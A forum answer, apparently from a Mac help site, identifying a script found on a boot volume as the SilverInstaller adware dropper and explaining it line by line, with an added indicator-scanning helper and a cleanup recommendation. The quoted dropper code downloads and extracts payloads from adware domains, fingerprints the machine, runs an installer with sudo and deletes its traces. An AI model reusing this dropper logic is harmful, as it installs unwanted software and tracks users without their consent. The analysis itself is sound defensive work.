What is this unknown executable on my boot volume? Is it malicious?

This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.

Installed software in this package likely includes

MacKeeper, VSearch, a Pirrit injector, BrowserEnhancer, MPlayer

all of which you most certainly don't want.

  • https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/
  • https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code:

#!/bin/bash

This is a script to be interpreted by bash, as noted by the shebang.

func_4(){

Begin a function declaration, including its body, to be called later on.

/bin/mkdir -p /var/tmp

Make sure the tmp directory exists to be used for temporary storage of the malicious payloads later on.

/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.premiummac.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs

Download and extract the first malicious payload. sr_v2.tgz is BrowserEnhancer. The payload contains a dvs directory.

mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

Get a unique identifier for this machine to be used later.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] || [ "$COUNTRY" == "NZ" ]\
  || [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] || [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
  || [ "$COUNTRY" == "DE" ]; then

Try some region matching to decide what to do next. I say ‘try’ because this doesn't work when the region is hard-coded in the script.

    sudo ./setup.sh "http://www.searchitdown.com/?n=026&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?n=026&searchsource=69&UM=8&gd=SY1000653" "http://www.searchitdown.com/Results.aspx?n=026&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" "http://i.firstinstallmac.club/c/cc?id="

Call to an external script with some more fancy adware domains.

else
    sudo ./setup.sh "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=nt&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&type=TGE_2712c1" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id="
fi

This bit never gets executed as mentioned.

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
    /usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i="
fi

Grab another payload.

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
func_taaVqst &

Clean up, removing the files created and dropped earlier in the script, after a delay, given that the files would have been used by then.

}
func_4 &

Function all ready to go, time to call it.
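A triage helper for the artifacts and indicators named in this breakdown, written as an added example (not code from the original answer). It assumes a volume root to check and a suspect script file; the domains and /var/tmp paths are the ones quoted above, the `si_` function names are hypothetical, and the sample script it scans is constructed inline.

```shell
#!/bin/bash
# Hypothetical triage helper (added example, not from the original answer):
# checks a volume for the on-disk artifacts the SilverInstaller dropper leaves
# and counts the dropper's indicators in a suspect script. Nothing is
# downloaded or executed; the domains and paths are those quoted above.
SI_DOMAINS="c.premiummac.com i.firstinstallmac.club searchitdown.com feed.snowbitt.com"
SI_PATHS="var/tmp/sr.tgz var/tmp/dvs"

# si_check_artifacts ROOT : list dropper artifacts under ROOT ("/" for the
# live system, or a mounted boot volume). Returns 0 if any exist, 1 otherwise.
si_check_artifacts() {
  root="${1%/}"; found=1
  for p in $SI_PATHS; do
    if [ -e "$root/$p" ]; then
      echo "artifact present: $root/$p"
      found=0
    fi
  done
  return $found
}

# si_scan_script FILE : print how many SilverInstaller indicators FILE contains
# (adware domains, the IOPlatformUUID fingerprint, the delayed /var/tmp cleanup).
si_scan_script() {
  f="$1"; hits=0
  for d in $SI_DOMAINS; do
    if grep -q -F "$d" "$f"; then hits=$((hits + 1)); fi
  done
  if grep -q 'IOPlatformUUID' "$f"; then hits=$((hits + 1)); fi
  if grep -q -E 'rm -rf /var/tmp/(dvs|sr\.tgz)' "$f"; then hits=$((hits + 1)); fi
  echo "$hits"
}

# Demo on a constructed sample: fake artifacts plus a cut-down copy of the
# dropper's lines, written to a temporary directory and removed afterwards.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/var/tmp/dvs"
: > "$demo_dir/var/tmp/sr.tgz"
cat > "$demo_dir/sample.sh" <<'EOF'
/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.premiummac.com/static/sr/sr_v2.tgz"
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { print }')
rm -rf /var/tmp/dvs
EOF
si_check_artifacts "$demo_dir"
echo "indicators in sample.sh: $(si_scan_script "$demo_dir/sample.sh")"  # 3
rm -rf "$demo_dir"
```

On a real volume, a non-zero artifact count or any indicator hit is a reason to pull the script and /var/tmp contents for analysis before cleaning up, since the dropper deletes its own files after 220 seconds.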


That script does everything I would expect malware to do and has been around for a while, so the domains it connects to could be blocked or shut down now.

  • Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your Mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run (and even if you did once), downloading and running the MalwareBytes cleaner would be my next step.

  • https://www.malwarebytes.com/